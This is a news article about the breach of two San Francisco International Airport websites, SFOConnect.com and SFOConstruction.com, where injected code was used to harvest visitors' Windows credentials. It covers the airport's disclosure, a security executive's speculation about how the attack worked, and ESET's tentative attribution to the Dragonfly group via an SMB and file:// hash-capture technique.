Two websites affiliated with San Francisco International Airport (SFO) were compromised with code last March, allowing attackers to steal device login credentials from users who visited these sites, airport officials have disclosed.

The breach affected the websites SFOConnect.com, which appears to deliver informational content to the SFO workforce, and SFOConstruction.com, which includes details on airport construction projects, bids and contracts.

In an online notification posted this week, SFO says the incident may have affected individuals who specifically accessed the two websites using an Internet Explorer browser installed on either a personal Windows device or a device not maintained by SFO.

The attack is somewhat unusual because users don’t typically type in their personal device credentials when visiting a website. A more common scenario when a website breach like this occurs would be for the malicious code to steal web account credentials when registered users log in to the affected site, or steal payment card information if a user makes a purchase.

But the breach notification indicates that the attackers stole device credentials: “At this time, it appears the attackers may have accessed the impacted users’ usernames and passwords used to log on to those personal devices [that accessed the compromised websites.]

SC Media contacted SFO to confirm if it was actually device credentials and not website credentials that were stolen. Strategic Communication Advisor Francis Tsang replied, “Our statement is accurate.”

The notification also says that the malware was removed and both sites were taken offline after the breach was discovered. SFOConnect.com appears to up and running again today, offering its visitors COVID-19 support resources. SFOConstruction.com is still under maintenance.

SFO also says that on March 23 it forced a reset for any SFO-related email and network passwords, presumably in case any victims use the same stolen credentials for email and network connectivity as well.

Colin Bastable, CEO Lucy Security, told SC Media that while recently surveilling the dark web he found “around 8,000 compromised credentials from late February featuring a couple of flysfo.com email addresses. Perhaps one of these opened the door, allowing the malicious code to be dropped in the SFO websites.”

SC Media asked Bastable to speculate how the attackers might have been able to steal user device credentials when they visited the compromised site — a scenario that he thought was “unlikely” before SFO ultimately went on to confirm it. He theorized that the attack code could have generated a form field specifically asking site visitors to enter their device credentials. Alternatively, perhaps the malware embedded into the websites was able to load additional code onto the devices themselves, he added.

UPDATE 4/15: ESET has reported that the attack on the two websites relied on tactics, techniques and procedures that are typically attributed to the reputed Russian state-sponsored ATP group Dragonfly, aka Energetic Bear.

“The intent was to collect Windows credentials (username/NTLM hash) of visitors by exploiting an SMB feature and the file:// prefix,” said ESET in a series of tweets. ESET researcher Matthieu Faou did tweet a note of caution, saying that “it can be another group that mimics their TTPs, we can’t be 100% sure.”